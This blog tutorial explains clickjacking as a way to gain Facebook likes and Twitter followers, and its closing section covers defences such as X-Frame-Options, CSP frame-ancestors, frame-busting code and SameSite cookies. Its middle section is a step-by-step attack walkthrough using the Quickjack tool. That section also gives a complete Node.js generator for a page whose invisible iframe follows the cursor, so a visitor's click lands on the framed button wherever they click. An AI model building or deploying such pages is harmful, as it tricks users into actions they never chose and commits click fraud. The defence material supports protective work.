In this blog post I will show you how a technique called ‘clickjacking’ can be used to gain thousands of real Facebook likes, Twitter followers, Google +1’s, you name it. The trick could, in principle, make every single visitor of your website like your Facebook page without them ever knowing.

But more importantly, I will also show you how you can prevent this from happening to your website. Be ready for some technical terms. To follow this tutorial, you should at the very least have some basic knowledge of HTML.

And please, before you read any further, be sure to read and understand the warning below!

Warning: Clickjacking is an extreme blackhat practice. At internetstartup.vn we have never used, nor will we ever use, any blackhat hacks or other such methods to gain exposure. We recommend you do neither! The information provided in this article is to be used for educational purposes only and to help you protect yourself against such hacks. We are not responsible for any misuse of the information provided.

What the heck is clickjacking anyway?

Clickjacking, also known as a “UI redress attack”, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they intended to click on the top-level page. The attacker thus “hijacks” clicks meant for their own page and routes them to another page, most likely owned by another application, another domain, or both.

For example, imagine an attacker who builds a website with a button that says “click here to go to Google”. On top of that page, the attacker has loaded an iframe containing a Twitter Follow button, and positioned the iframe so that the invisible “Follow” button sits exactly on top of the “click here to go to Google” button. The victim tries to click the link to Google, but actually clicks the invisible Twitter Follow button, and now follows the attacker on Twitter without knowing it. In essence, the attacker has “hijacked” the user’s click, hence the name “clickjacking”. The reason it works is that the framed page is loaded with the victim’s own session: the browser sends the victim’s Twitter (or Facebook) cookies along with the frame regardless of which site embedded it, so the click is processed as a genuine action by a logged-in user.

Back in 2009, clickjacking made the news in the form of a Twitter worm. This clickjacking attack convinced users to click on a button which caused them to re-tweet a link to the malicious page, causing it to go viral.

Clickjacking was initially discovered by Robert Hansen and Jeremiah Grossman.


Digging in

To do this, we will be using a brand new tool called Quickjack (a brilliant but nasty tool by Samy Kamkar) to automatically generate the code that makes the victim’s click land on the target no matter where on the page they click. But before we can do any of that, we have to create a Like button.

Step 1: Creating a Facebook Like button

You can head over to this Facebook page, which lets you easily generate a Like button. Make sure to disable the “Show Friends’ Faces” option, and don’t include the Share button. Then click the ‘Get Code’ button.


Step 2: Set-up a page for the Like button

Now that we have the code for the Like button, we need a page to display it on. Copy and paste the code you just generated on Facebook into a blank HTML file, and upload it to your web server.


Step 3: Generate the clickjacking script

This is where the fun begins. Head over to the Quickjack tool mentioned earlier, and enter the link to your Like-button page in the input field. Then click the ‘Go’ button next to the input:


Quickjack will load your Like-button page into its own page, but because the Like button is so small it will appear behind Quickjack’s own input and buttons. Use the drag tool (the black arrow icon in the top left) to drag Quickjack’s controls below your Like button.

Next, we have to tell Quickjack where we want to force the user to click. We want our victims to click the Like button, so go ahead and click on it. A red crosshair will appear to indicate where you’ve set your click target. You can now click the “I’m done!” button to generate the code for the clickjacking script.
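What Quickjack hands you at this point is essentially a page like the one generated below. This is an added example of my own, not Quickjack’s generated code and not code from the original post: a small Node.js function that emits a “click-anywhere” clickjacking page. The target URL https://example.com/like.html, the coordinates and the decoy text are made-up sample values. It also generalizes the static overlay described in the introduction: instead of lining the invisible frame up with one decoy button, a small transparent window onto the framed page chases the cursor, so a click anywhere on the decoy lands on the target element.

```javascript
'use strict';

// Escape a value for safe interpolation into an HTML attribute.
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Build a "click-anywhere" clickjacking page (hypothetical generator, not Quickjack's output).
//   targetUrl            - the framed page, e.g. the page hosting the Like button (assumed URL)
//   targetX / targetY    - position, inside the framed page, of the element the victim should hit
//   clipWidth/clipHeight - size of the visible window onto the framed page (about a button's size)
//   decoyHtml            - whatever the victim believes they are looking at
function buildClickjackPage({ targetUrl, targetX, targetY, clipWidth = 80, clipHeight = 20, decoyHtml = '' }) {
  for (const n of [targetX, targetY, clipWidth, clipHeight]) {
    if (!Number.isInteger(n) || n < 0) throw new TypeError('coordinates and sizes must be non-negative integers');
  }
  return `<!doctype html>
<html>
<head>
<meta charset="utf-8">
<style>
  body { margin: 0; }
  /* A small, fully transparent window onto the framed page. It sits above everything,
     still receives clicks, and only ever shows the region around the target element. */
  #clip {
    position: fixed; left: 0; top: 0;
    width: ${clipWidth}px; height: ${clipHeight}px;
    overflow: hidden; opacity: 0; z-index: 2147483647;
  }
  /* The framed page is shifted so that the target element sits at the clip's origin. */
  #clip iframe {
    position: absolute; border: 0; width: 2000px; height: 2000px;
    left: ${-targetX}px; top: ${-targetY}px;
  }
</style>
</head>
<body>
${decoyHtml}
<div id="clip"><iframe src="${escapeAttr(targetUrl)}" scrolling="no"></iframe></div>
<script>
  (function () {
    var clip = document.getElementById('clip');
    var w = ${clipWidth}, h = ${clipHeight};
    // The clip is too small to keep the cursor inside it: almost any movement leaves it, the
    // parent document sees the mousemove and re-centres the clip under the cursor. When the
    // victim stops moving and clicks, the invisible target element is what receives the click.
    document.addEventListener('mousemove', function (e) {
      clip.style.left = (e.clientX - w / 2) + 'px';
      clip.style.top = (e.clientY - h / 2) + 'px';
    });
  })();
</script>
</body>
</html>`;
}

// Constructed sample input: a decoy page framing a hypothetical Like-button page whose
// button sits roughly at (10, 5) inside that page.
const SAMPLE = buildClickjackPage({
  targetUrl: 'https://example.com/like.html',
  targetX: 10,
  targetY: 5,
  decoyHtml: '<p style="padding:4em">Click anywhere to continue to Google</p>',
});

// `node clickjack-gen.js > decoy.html` writes the generated page to a file.
if (typeof require !== 'undefined' && require.main === module) process.stdout.write(SAMPLE);
```

Open the generated file in a browser to watch the invisible window follow the cursor. Against a real Like-button page it only works if that page lets itself be framed and the browser still sends the victim’s session cookies into the frame, which is exactly what the defences described later in this article take away.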



Step 4: Let the clickjacking begin!

Defending against Clickjacking

There are two main ways to prevent clickjacking:

- Sending the proper X-Frame-Options HTTP response header (DENY, or SAMEORIGIN if your own pages need to frame it), which instructs the browser not to allow framing from other domains. Its modern equivalent is the Content-Security-Policy frame-ancestors directive, which browsers honour in preference to X-Frame-Options when both are present; send both, since older browsers only understand the former.
- Employing defensive code in the UI to ensure that the current frame is the top-level window. A bare “if (top != self) top.location = self.location” can be defeated by loading the page in an iframe with the sandbox attribute, which blocks the navigation, so the recommended form hides the page body by default and only reveals it when the page really is the top-level window.

I don’t want to make this article too technical, so for more information on clickjacking defence, please head over to the Clickjacking Defense Cheat Sheet. One more thing worth knowing: because the attack depends on the victim’s session cookies being sent into a frame embedded by a third-party site, cookies marked SameSite=Lax or SameSite=Strict are not sent in that situation, which blocks this kind of attack as a side effect.

